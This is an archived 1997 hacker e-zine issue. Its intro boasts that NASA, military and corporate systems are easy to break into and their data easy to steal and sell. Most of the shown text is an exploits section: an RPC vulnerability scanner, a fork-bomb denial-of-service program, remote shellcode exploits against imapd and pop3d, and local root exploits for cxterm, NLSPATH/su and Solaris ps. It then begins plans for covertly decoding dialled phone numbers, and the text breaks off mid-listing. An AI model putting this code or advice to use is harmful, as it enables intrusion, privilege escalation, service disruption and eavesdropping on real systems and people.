Hackers Handbook - Millenium Edition

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / magazines / crh / crh003.txt < prev next >

Wrap

Text File | 1998-06-25 | 125.3 KB | 3,306 lines

─────────────────────────────────────────────────────────────────────────────── .oO The CodeZero Oo. .oO Presents Oo. ─────────────────────────────────────────────────────────────────────────────── Welcome to issue 3, the special summer edition of... ─────────────────────────────────────────────────────────────────────────────── /IIIIIIIIII /IIIIIIIIII /III /III \ III_____/ \ III___/III \ III \ III \ III \ III \ III \ III \_III \ III onfidence \ IIIIIIII emains \ IIIIIIIIII igh \ III \ III__/III \ III__/ III \ III \ III \ III \ III \ III \ IIIIIIIIII ___ \ III \ III ___ \ III \ III ___ \_________/ /\__\ \__/ \__/ /\__\ \__/ \__/ /\__\ \/__/ \/__/ \/__/ [15/o7/97] ─────────────────────────────────────────────────────────────────────────────── CRH Editor : Tetsu Khan Official CRH Kung-Fu Film : Turf On A Rope Official CRH Pimp : so1o Official CRH Spic With A Red Hat : xFli Official CRH T-Shirt Supplier : NightRage Official CRH Visual Basic Coder : \\StOrM\\ aka Jason Sloderbeck Official CRH Print Brother : Digital Darkness ─────────────────────────────────────────────────────────────────────────────── .-----------[ An Official ]-----------. : .-----. .----. .--.--. : : : .--' : .-. : : : : : !_-:: : : : `-' ; : . : ::-_! :~-:: :: : :: . : :: : ::-~: : ::.`--. ::.: : ::.: : : : `-----' `--'--' `--'--' : !_-:: ::-_! :~-::-[ Confidence Remains High ]-::-~: :~-:: ::-~: `-----------[ Production ]------------' ─────────────────────────────────────────────────────────────────────────────── In This "Added Linux Exploits" Issue : ─────────────────────────────────────────────────────────────────────────────── -----=> Section A : Introduction And Cover Story. 1. Confidence Remains High issue 3 [summer edition]...: Tetsu Khan 2. The network is our playground......................: so1o -----=> Section B : Exploits And Code. 1. RPC-Check.sh.......................................: yo 2. DoS : superforker.c................................: Vio 3. Cool Bot Juarez : personal.tcl.....................: Scorn 4. Linux imapd remote exploit.........................: Savage 5. Linux pop3 remote exploit..........................: Savage 6. Linux cxterm exploit...............................: Ming Zhang 7. Linux nlspath exploit..............................: Solar Designer 8. Solaris 2.5.1 ps exploit...........................: J. Zbiciak 9. 0wned.c............................................: so1o -----=> Section C : Phones / Scanning / Radio. 1. DTMF Decoder.......................................: xFli 2. Dealing With Directory Assistance Operators........: Qytpo 3. Russian fone #'s (+7 095 XXXxxxx)..................: CyberLirik 4. How to fuck over a UK payphone.....................: so1o / NightRage 5. Radio link for TI-85 calculators...................: Michael Jan -----=> Section D : Miscellaneous. 1. More sIn inf0z.....................................: The CodeZero + Friends 2. Rooting From Bin...................................: so1o 3. DNS Spoofing.......................................: so1o 4. FreeNet............................................: TrN 5. Backdoors Revised..................................: Blk-Majik 6. One Last Thing About The Infamous pHf Technique....: so1o 7. Test-cgi holes.....................................: so1o 8. Tree raping........................................: digitalboy [DD] 9. .htpasswd + .htaccess..............................: Cain [DD] -----=> Section E : World News. 1. Some History.......................................: nobody 2. [GUNNAR] and MadSeason and sIn.....................: so1o 3. "Welcome to the [D]epartment of [O]wned [E]nergy"..: so1o 4. LOPHT.COM..........................................: so1o 5. AAA Report.........................................: so1o 6. Lamer of the fucking year : pSId (DALnet)..........: so1o ------=> Section F : Projects. 1. STiK...............................................: mstrhelix -----=> Section G : The End. (+ Personal Column) ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. Confidence Remains High issue 3 [summer edition] : Tetsu Khan ─────────────────────────────────────────────────────────────────────────────── Issue 4 will be out at the beginning of September, so to last you through the long hot summer nights, we present the special summer issue of Confidence Remains High, effectively issue 3 with more stuff in it. blah blah blah....codez.com is going down so here's the list : Confidence Remains High distro site list... ------------------------------------------- http://insecurity.insecurity.org/codez/ http://www.r0ot.org http://www.exceed.net http://www.7thsphere.com/hpvac/hacking.html ftp://ftp.sekurity.org/users/so1o/ ...And alot of other sites, just go looking around. ─────────────────────────────────────────────────────────────────────────────── 2. The network is our playground : so1o ─────────────────────────────────────────────────────────────────────────────── Just sit back for a few minutes and consider how much power we have as hackers, from our Linux boxes, or Wind0ze systems, we can connect to many thousands of Government or Military sites, as well as company networks where useful information such as credit card details can easily be found, all we need is the knowledge of holes in such systems, the means to exploit these holes, and the skills needed to "root" the system, thats all it takes. In 15 minutes, a hacker could 0wn many important NASA systems, and then proceed to pull the following types of files from such a system... - Personnel information. - Mission reports and test results. - Satellite programs and information. - Future mission dates. Or say it was a military system, then that hacker, if he knew what he was doing would be able to gain access (with relative ease) to the following kinds of files... - Personnel information. - Weapons reports. - Tactical analysis. - Future mission dates. - Intelligence papers. Lets say that a hacker was to attack a company, such as Intel, then he would be able to access... - Product test results. - Internal mail between users. - Future plans or products. - Blueprints. ... then that hacker could sell off that companies research and development reports to others, and make some ca$h. It is clear to see, that from the power we have by just owning a computer and a modem is quite huge in the right hands, and that it is pretty simple to go out and find yourself some classified information if you really want to. ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. RPC-Check.sh : yo ─────────────────────────────────────────────────────────────────────────────── #!/bin/sh #rpc.chk 1.0 # # Make sure you have got a newer version of Bourne Shell (SVR2 or newer) # that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS) # or /bin/sh (Sun OS, RS/6000 etc) If it's located elsewhere, feel free to # change the magic number, indicating the type of executable Bourne Shell. # # The script obtains via nslookup utility a list of hostnames from a nameserver # and checks every entry of the list for active rexd procedures as well as # ypserver procedures. The output is a list of the sites that run those # daemons and are insecure. # -yo. domainname=$1 umask 022 PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH # # Function collects a list of sites # from a nameserver. Make sure you've got the nslookup utility. # get_list() { ( echo set type=ns echo $domainname ) | nslookup | egrep "nameserv" | cut -d= -f2> .tmp$$ 2>/dev/null if [ ! -s .tmp$$ ]; then echo "No such domain" >&2 echo "Nothing to scan" >&2 exit 1 fi for serv in `cat .tmp$$`;do ( echo server $serv echo ls $domainname ) | nslookup > .file$$ 2>/dev/null lines=`cat .file$$ | wc -l` tail -`expr $lines - 7` .file$$ | cut -d" " -f2 > .file.tmp # .file sed -e "s/$/.$domainname/" .file.tmp > .hosts$$ rm -rf .file* .tmp$$ sort .hosts$$ | uniq -q >> HOSTS$$; rm -rf .hosts$$ done tr 'A-Z' 'a-z' <HOSTS$$ |sort|uniq -q > HOSTS.$domainname;rm -rf HOSTS$$ } # Function rpc_calls() { for entry in `cat HOSTS.$domainname`; do ( rpcinfo -t $entry ypserv >/dev/null && echo $entry runs YPSERV || exit 1 # Error! ) >> .log 2>/dev/null ( rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD || exit 1 # Error ! ) >> .log 2>/dev/null done } # Main if [ "$domainname" = '' ]; then echo "Usage $0 domainname" >&2 exit 1 fi get_list echo "Checking $domainname domain" > .log echo "*****************************" >> .log echo "Totally `cat HOSTS.$domainname | wc -l` sites to scan" >> .log echo "******************************" >> .log echo "started at `date`" >> .log echo "******************************" >> .log rpc_calls echo "******************************" >> .log echo "finished at `date`" >> .log ─────────────────────────────────────────────────────────────────────────────── 2. DoS : superforker.c : Vio ─────────────────────────────────────────────────────────────────────────────── This program is fucking evil, I have tested it on a few systems and it just screws them over and sloooOOooows them right down, you cant throw anything at the shell, its pretty sadistic... /* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the bugtraq This program is a beefed up classic denial of service fork()'er :) Compilation: on BSD type of systems do: gcc -DBSD_C -o cvn cvn.c on SysV type of systems do: gcc -DSYSV_C -o cvn cvn.c on my linux, I can compile it with both -DBSD_C and -DSYSV_C if your not sure, you can experiment, or compile it without any -D'efines In the future: SunOS signals ignored. Creation of random symlinks for more gory destruction. Using advanced technology coding to make the hard drive blow up with a loud boom and the console explode causing a nuclear meltdown. Direct All Suggestions And Flames to: Vio NOTE: this program is provided for educational purposes only, its author will not take any responsibility for any stupid things you will decide to do. this has been tested, but not the latest version of it. */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <signal.h> #define MAX_FILELEN 100 /* The _actual_ max length */ #define MAX_DIRLEN 10 #define START_DIR "/tmp" /* This can be substituted for any directory */ /* that you have write access to */ void dirs_generator(void); main(int argc, char *argv[]) { int fp; char *buff; char chr; unlink(argv[0]); /* You might wanna ignore all the signals you can ignore.. */ signal(SIGINT, SIG_IGN); /* If any of the signals don't work */ signal(SIGHUP, SIG_IGN); /* on the system you are compiling */ signal(SIGTERM, SIG_IGN); /* them on, just erase that line */ signal(SIGALRM, SIG_IGN); signal(SIGBUS, SIG_IGN); signal(SIGFPE, SIG_IGN); signal(SIGILL, SIG_IGN); signal(SIGIOT, SIG_IGN); signal(SIGPIPE, SIG_IGN); signal(SIGQUIT, SIG_IGN); signal(SIGSEGV, SIG_IGN); signal(SIGTRAP, SIG_IGN); signal(SIGUSR1, SIG_IGN); signal(SIGUSR2, SIG_IGN); #ifdef BSD_C signal(SIGPROF, SIG_IGN); signal(SIGSTOP, SIG_IGN); signal(SIGTSTP, SIG_IGN); signal(SIGTTIN, SIG_IGN); signal(SIGTTOU, SIG_IGN); signal(SIGVTALRM, SIG_IGN); signal(SIGXCPU, SIG_IGN); signal(SIGXFSZ, SIG_IGN); #endif #ifdef SYSV_C signal(SIGPOLL, SIG_IGN); signal(SIGPWR, SIG_IGN); #endif if(fork()) { printf("Now crashing and blowing up this system.. have a nice day\n"); printf("You can safely logout, and let the proggie do its work\n"); printf("or you can stick around and watch lag go from 0 to bitch\n"); printf("in a matter of seconds\n"); printf(" --CoViN \n"); exit(0); } fp=open("/tmp/.foo",O_WRONLY|O_CREAT); if(fork()) { while(1) { fork(); buff = malloc(64000); write(fp, buff, 64000); system("uptime"); } } dirs_generator(); } void dirs_generator(void) { char alph[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. "; char fl[MAX_FILELEN]; char dir[MAX_DIRLEN]; int i; int flen; printf("Making dirs..\n"); chdir(START_DIR); fork(); /* For the simplicity of the code.. we also want more dir's from */ fork(); /* the START_DIR */ fork(); while(1) { fork(); flen= (rand() % MAX_FILELEN) - 1; for(i=0; i<flen; i++) fl[i] = alph[rand() % strlen(alph)]; fl[MAX_FILELEN-1]=0; i=open(fl,O_WRONLY|O_CREAT); write(i,"fuck you! CoViN",16); close(i); flen= (rand() % MAX_DIRLEN) - 1; for(i=0; i<flen; i++) dir[i] = alph[rand() % strlen(alph)]; dir[MAX_DIRLEN-1]=0; mkdir(dir,0); chdir(dir); } } ─────────────────────────────────────────────────────────────────────────────── 3. Cool Bot Juarez : personal.tcl : Scorn ─────────────────────────────────────────────────────────────────────────────── # A simple example of using public responses to give the bot # a personality. Send comments to SCORN (scorn@destiny.net). # pHEARSOMe in #linuxwarez on EFnet runs this exact TCL script # flag to turn personality on and off set persona_flag 1 # min delay time between responses to prevent flooding set persona_wait 10 # binds to answer questions bind pubm - "*one*know*if*\\?*" pub_answer bind pubm - "*one*know*how*\\?*" pub_answer bind pubm - "*pHEARS*\\?*" pub_answer bind pubm - "*pHEARS*bot*" pub_answer # binds to answer greetings bind pubm - "*re all*" pub_greet bind pubm - "*hello all*" pub_greet bind pubm - "*hi all*" pub_greet bind pubm - "*sup*every*" pub_greet bind pubm - "*sup*all*" pub_greet # binds to answer goodbyes bind pubm - "*cya*all" pub_bye bind pubm - "*bbl*" pub_bye bind pubm - "*bbia*" pub_bye bind pubm - "*later*every*" pub_bye bind pubm - "*bye*every*" pub_bye bind pubm - "*ttyl*every*" pub_bye bind pubm - "*later*all*" pub_bye bind pubm - "*ttyl*all*" pub_bye bind pubm - "*bye*all*" pub_bye # binds to answer STUPID questions bind pubm - "*one*got*site*" pub_stupid # misc. binds bind pubm - "*where*tk3play*" pub_tk3 bind pubm - "*url*tk3play*" pub_tk3 bind pubm - "*tk3play*where*" pub_tk3 bind pubm - "*tk3play*url*" pub_tk3 bind pubm - "*what*mp3*player*" pub_tk3 bind pubm - "*where*mp3*player*" pub_tk3 # arrays of responses set stupid(0) "go ask for that in #linux, they might help you out there" set stupid(1) "try ftp.linuxwarez.com!! it's got everything!!" set stupid(2) "I got that, but I ain't givin it to you" set stupid(3) "I tried to get that in #exceed today, but when i asked for it, it said 'cannot send to channel' but i don't want to send, i want to get!!! what am I doing wrong?" set stupid(4) "no, but I got nekkid pics of sh00p if ya want." set stupid(5) "no, but I got crabs, ya want some?" set stupid(6) "I got that, I got that!!" set stupid(7) "Talk to Trinitron, he's probably got that" set stupid(8) "don't trade warez!!! its illegal!! you're gonna git busted!!" set stupid(9) "I used to have that, but the fEDZ got muh warez CD and won't give it back :(" set stupid(10) "why don't yew stop leeching and start offering, ya lamah" set stupid(11) "don't bother, it really sux. I rm -rf'd that REAL quick." set stupid(12) "I got that, here, lemme send it over. But i'm on a 2600 baud modem." set stupid(13) "when you get that, can you upload it to whitehouse.gov ftp site for me please?" set stupid(14) "Linus Torvalds is giving that away, email him bout it" set stupid(15) "I got that, but i'm only trading that for nude pics of sh00p." set stupid(16) "I got that, but i'm only trading that for Linux for win95" set stupid(17) "can you offer that up when ya git it? :)" set stupid_size 18 set answer(0) "hellz yea" set answer(1) "fuck no!" set answer(2) "it's possible..." set answer(3) "who cares? I shure as hell don't" set answer(4) "I dunno, go ask in #lamer" set answer(5) "I could tell ya, but then i'd have to kill ya." set answer(6) "maybe" set answer(7) "hmmm...." set answer(8) "uh....." set answer(9) "err...." set answer(10) "lemme think about that one for a sec" set answer(11) "I ain't no Answer Wizard" set answer(12) "RTFM" set answer(13) "nope" set answer(14) "um, no" set answer(15) "ya, i think so" set answer(16) "no way" set answer_size 17 set greets(0) "sup" set greets(1) "yo!" set greets(2) "oh no not you again" set greets(3) "hey whut's up" set greets(4) "you came in the wrong room this ain't #dogsex," set greets(5) "go away" set greets(6) "well look who's here, its" set greets(7) "hey, i hear #netsex misses you," set greets(8) "we missed you" set greets(9) "oh no, yew gotta be another #oldwarez lamer, aren't you," set greet_size 10 set bye(0) "lata" set bye(1) "and don't come back" set bye(2) "cyaz" set bye(3) "goin to #sexpics again I see...yer a perv" set bye(4) "bye" set bye(5) "take it easy" set bye(6) "see ya in hell" set bye_size 7 # general functions to answer questions randomly, has a # delay so other more specific binds will have priority proc pub_answer {nick uhost hand channel args} { global persona_flag answer_nick answer_channel if {$persona_flag} { set answer_nick $nick set answer_channel $channel utimer 1 _pub_answer } return 0 } proc _pub_answer {} { global answer answer_size persona_flag answer_nick answer_channel if {$persona_flag} { persona_pause putserv "PRIVMSG $answer_channel :$answer([rand $answer_size])" putlog "<<$answer_nick>> Persona-Answer" return 1 } return 0 } # function to answer greetings proc pub_greet {nick uhost hand channel args} { global greets greet_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$greets([rand $greet_size]) $nick" putlog "<<$nick>> Persona-Greet" return 1 } return 0 } # function to answer stupid stuff proc pub_stupid {nick uhost hand channel args} { global stupid stupid_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$nick , $stupid([rand $stupid_size])" putlog "<<$nick>> Persona-Stupid" return 1 } return 0 } # function to answer goodbyes proc pub_bye {nick uhost hand channel args} { global bye bye_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$bye([rand $bye_size]) $nick" putlog "<<$nick>> Persona-Bye" return 1 } return 0 } # misc. functions proc pub_tk3 {nick uhost hand channel args} { global persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$nick, check out tk3play at bleh" putlog "<<$nick>> Persona-tk3play" return 1 } return 0 } # function to enforce minimum pause between responses proc persona_pause {} { global persona_flag persona_wait if {$persona_flag} { persona_off utimer $persona_wait persona_on } return 1 } # functions to turn the personality on and off proc persona_on {} { global persona_flag set persona_flag 1 return 1 } proc persona_off {} { global persona_flag set persona_flag 0 return 1 } putlog "Scorn's persona.tcl is loaded" ─────────────────────────────────────────────────────────────────────────────── 4. Linux imapd remote exploit : Savage ─────────────────────────────────────────────────────────────────────────────── /* * IMAPd Linux/intel remote xploit by savage@apostols.org 1997-April-05 * * Workz fine against RedHat and imapd distributed with pine * * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of ToXyn !!! * * usage: * $ (imap 0; cat) | nc victim 143 * | * +--> usually from -1000 to 1000 ( try in steps of 100 ) */ #include <stdio.h> char shell[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88" "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e" "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xe8\xc0\xff\xff\xff/bin/sh"; char username[1024+255]; void main(int argc, char *argv[]) { int i,a; long val; if(argc>1) a=atoi(argv[1]); else a=0; strcpy(username,shell); for(i=strlen(username);i<sizeof(username);i++) username[i]=0x90; /* NOP */ val = 0xbffff501 + a; for(i=1024;i<strlen(username)-4;i+=4) { username[i+0] = val & 0x000000ff; username[i+1] = (val & 0x0000ff00) >> 8; username[i+2] = (val & 0x00ff0000) >> 16; username[i+3] = (val & 0xff000000) >> 24; } username[ sizeof(username)-1 ] = 0; printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username); } ─────────────────────────────────────────────────────────────────────────────── 5. Linux pop3 remote exploit : Savage ─────────────────────────────────────────────────────────────────────────────── /* * pop3d Linux/intel remote xploit by savage@apostols.org 1997-April-05 * * workz fine against old pop3d distributed with pine. * * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of ToXyn !!! * * usage: * $ (imap 0; cat) | nc victim 143 -- "doesnt pop3 run on 110?" - so1o * | * +--> usually from -100 to 100 */ #include <stdio.h> char shell[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88" "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e" "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xe8\xc0\xff\xff\xff/bin/sh"; char username[1024+255]; void main(int argc, char *argv[]) { int i,a; long val; if(argc>1) a=atoi(argv[1]); else a=0; strcpy(username,shell); for(i=strlen(username);i<sizeof(username);i++) username[i]=0x90; /* NOP */ val = 0xbffff501 + a; for(i=1024;i<strlen(username)-4;i+=4) { username[i+0] = val & 0x000000ff; username[i+1] = (val & 0x0000ff00) >> 8; username[i+2] = (val & 0x00ff0000) >> 16; username[i+3] = (val & 0xff000000) >> 24; } username[ sizeof(username)-1 ] = 0; printf("USER %s\nPASS Yoshemite\n", username); } ─────────────────────────────────────────────────────────────────────────────── 6. Linux cxterm exploit : Ming Zhang ─────────────────────────────────────────────────────────────────────────────── /* cxterm buffer overflow exploit for Linux. This code is tested on both Slackware 3.1 and 3.2. Ming Zhang mzhang@softcom.net */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define CXTERM_PATH "/usr/X11R6/bin/cxterm" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i,OffSet = DEFAULT_OFFSET; /* use a different offset if you find this program doesn't do the job */ if (argc>1) OffSet = atoi(argv[1]); buff = malloc(2048); if(!buff) { printf("Buy more RAM!\n"); exit(0); } ptr = buff; for (i = 0; i <= BUFFER_SIZE - strlen(shellcode) - NOP_SIZE; i+=NOP_SIZE) { memcpy (ptr,nop,NOP_SIZE); ptr+=NOP_SIZE; } for(i=0;i < strlen(shellcode);i++) *(ptr++) = shellcode[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_sp() + OffSet; ptr = (char *)addr_ptr; *ptr = 0; (void) fprintf(stderr, "This bug is discovered by Ming Zhang (mzhang@softcom.net)\n"); /* Don't need to set ur DISPLAY to exploit this one, cool huh? */ execl(CXTERM_PATH, "cxterm", "-xrm",buff, NULL); } ─────────────────────────────────────────────────────────────────────────────── 7. Linux nlspath exploit : Solar Designer ─────────────────────────────────────────────────────────────────────────────── /* * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1 * by Solar Designer, 1997. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 2048 char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize - 4; i += 4) *(char **)&buffer[i] = get_sp() - 3072; memset(buffer, 0x90, 512); memcpy(&buffer[512], shellcode, strlen(shellcode)); buffer[bufsize - 1] = 0; setenv("NLSPATH", buffer, 1); execl("/bin/su", "/bin/su", NULL); } ─────────────────────────────────────────────────────────────────────────────── 8. Solaris 2.5.1 ps exploit : J. Zbiciak ─────────────────────────────────────────────────────────────────────────────── #!/bin/sh # # Exploit for Solaris 2.5.1 /usr/bin/ps # J. Zbiciak, 5/18/97 # # Just copy this into one file, upload it to a system, chmod 755 <file> and # then run it using <file> # change as appropriate CC=gcc # Build the "replacement message" :-) cat > ps_expl.po << E_O_F domain "SUNW_OST_OSCMD" msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n" msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025\343\150\220\013\200\016\222\003\240\014\224\032\200\012\234\003\240\024\354\073\277\354\300\043\277\364\334\043\277\370\300\043\277\374\202\020\040\073\221\320\040\010\220\033\300\017\202\020\040\001\221\320\040\010" E_O_F msgfmt -o /tmp/foo ps_expl.po # Build the C portion of the exploit cat > ps_expl.c << E_O_F /*****************************************/ /* Exploit for Solaris 2.5.1 /usr/bin/ps */ /* J. Zbiciak, 5/18/97 */ /*****************************************/ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> #define BUF_LENGTH (632) #define EXTRA (256) int main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; /* ps will grok this file for the exploit code */ char *envp[]={"NLSPATH=/tmp/foo",0}; u_long *long_p; u_char *char_p; /* This will vary depending on your libc */ u_long proc_link=0xef70ef70; int i; long_p = (u_long *) buf; /* This first loop smashes the target buffer for optargs */ for (i = 0; i < (96) / sizeof(u_long); i++) *long_p++ = 0x10101010; /* At offset 96 is the environ ptr -- be careful not to mess it up */ *long_p++=0xeffffcb0; *long_p++=0xffffffff; /* After that is the _ctype table. Filling with 0x10101010 marks the entire character set as being "uppercase printable". */ for (i = 0; i < (BUF_LENGTH-104) / sizeof(u_long); i++) *long_p++ = 0x10101010; /* build up _iob[0] (Ref: /usr/include/stdio.h, struct FILE) */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x0501FFFF; /* unbuffered output on stream 1 */ /* Note: "stdin" is marked as an output stream. Don't sweat it. :-) */ /* build up _iob[1] */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x4201FFFF; /* line-buffered output on stream 1 */ /* build up _iob[2] */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x4202FFFF; /* line-buffered output on stream 2 */ *long_p =0; /* The following includes the invalid argument '-z' to force the usage msg to appear after the arguments have been parsed. */ execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp); perror("execle failed"); return 0; } E_O_F # Compile it $CC -o ps_expl ps_expl.c # And off we go! exec ./ps_expl ─────────────────────────────────────────────────────────────────────────────── 9. 0wned.c : so1o ─────────────────────────────────────────────────────────────────────────────── /* THIS IS FUCKING PRIVATE SHIT, DONT DISTRIBUTE IT!@# */ /* I CODED THIS QUICKLY ONE NIGHT, IT WILL ROOT ANY LINUX 2.0.x BOX */ /* -D-O- -N-O-T- -D-I-S-T-R-I-B-U-T-E- */ /* so1o@insecurity.org */ main() { char a1='j',a2='0',a3='a',a4='r',a5='3'; char b1='w',b2='n',b3='d'; printf("%c%c%c %c%c%c\n",a1,a2,a2,a3,a4,a5); printf("%c %c %c %c %c\n\n",a2,b1,b2,a5,b3); printf("By so1o@insecurity.org 1997\n"); } ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. DTMF Decoder : xFli ─────────────────────────────────────────────────────────────────────────────── DTMF Decoder plans. ------------------- If you are into bigtime surveillance, or you just have some burning desire to get the phone number of your sisters sexy friend, then you will be interested in this little circuit. Basically, using this, you can use a tape recorder and a pickup coil to record the DTMF tones sent when someone dials a number, or if it is easier to you can wire it up to a phone jack and decode in realtime, and then decode them to get the number dialled. This can cope with speed dialling, but you will need a reasonably good recording to decode successfully. The circuit is simplicity itself, literally only 5 components. I could have included an unreadable ascii circuit diag / pcb layout, but it would have been a waste of time, so the diags are available from http://www.codez.com and other CodeZero sites. The hardware takes the DTMF signal, decodes it and sends it to lpt1, where the binary output of the ic is converted into standard numbers. The simple BASIC program is included. Which is precompiled on http://www.codez.com Component list: ---------------- 1 x SSI202 18 pin Chip 1 x 3.579 MHz quartz crystal 2 x 27n Capacitors 1 x 1M resistor Source: -------- DTMF DECODER SOFTWARE ------------------------------------------ ' Use this to decode the output from the decoder hardware ' Not written by xFli, suggested in an electronics mag. 10 